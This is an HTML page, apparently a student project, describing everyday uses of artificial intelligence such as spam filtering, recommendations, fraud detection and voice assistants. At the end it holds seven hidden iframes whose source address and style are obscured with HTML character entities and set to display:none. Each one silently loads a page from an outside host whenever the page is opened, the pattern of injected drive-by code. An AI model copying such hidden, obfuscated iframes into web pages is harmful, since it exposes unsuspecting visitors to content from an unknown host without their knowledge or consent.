<html>
<head>
   <title> computer project </title>
   
   
   <style>
   body{
   background:url(209910-P06STF-200.jpg) repeat fixed}
   
   #ss{ 
   color:#99d8d0;}
   #bb{
   color:#f4f6ff;
   }
   
   
   h1 { font-family: 'Avant Garde', Avantgarde, 'Century Gothic', CenturyGothic, AppleGothic, sans-serif; font-size: 35px; font-style: normal; font-variant: normal; font-weight: bold; line-height: 26.3999996185303px; } 
   
   
  .myButton {
	background-color:#2dabf9;
	border-radius:28px;
	border:1px solid #0b0e07;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:12px;
	padding:16px 31px;
	text-decoration:none;
	text-shadow:0px 1px 0px #263666;
}
.myButton:hover {
	background-color:#0688fa;
}
.myButton:active {
	position:relative;
	top:1px;}
	
a { color: #393e46; }
a:link{text-decoration:none; }
a:visited{text-decoration:none;}
a:hover{text-decoration:none;}


h3 {color:#f4f6ff;}
        
   
   </style>
</head>

<body>
<h1 align="center" id="ss" > ARTIFICIAL INTELLIGENCE </h1>
<br />
<h2 id="bb">links:</h2>

<ul>

<li> <button class="myButton" id="gg"><a href="difination.html">difination</a> </button>  </li>
<br />
<li> <button class="myButton"><a href="pros and cons.html">pros and cons</a> </button>  </li>
<br />
<li> <button class="myButton"><a href="uses.html">uses of AI</a> </button>  </li>
<br />
<li> <button class="myButton"><a href="role.html"> AI facing corona virus</a> </button>  </li>
<br />
<li> <button class="myButton"><a href="new.html"> main page</a> </button>  </li>

</ul> 


<p id="bb">Although artificial intelligence raises science fiction ideas, artificial intelligence already uses many uses today, for example :</p>
<h3>Email filtering:</h3> <p id="bb">Email services use artificial intelligence to filter incoming email messages. Users can train their spam filters by marking their email messages as "spam" .</p>
<h3>Personalization:</h3> <p id="bb">Online services use artificial intelligence to customize your experience. Services, such as Amazon or Netflix, "learn" from your previous purchases and those of other users in order to recommend relevant content to you</p>
<h3>Fraud detection: </h3> <p id="bb">Banks use artificial intelligence to determine if there is strange activity in your account. Unexpected activity, such as foreign transactions, can be marked by the algorithm</p>
<h3>Speech recognition:</h3> <p id="bb">The applications use artificial intelligence to improve speech recognition functions. Examples include smart personal assistants, for example "Alexa" from Amazon or "Siri" from Apple</p>

<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
</body>
</html>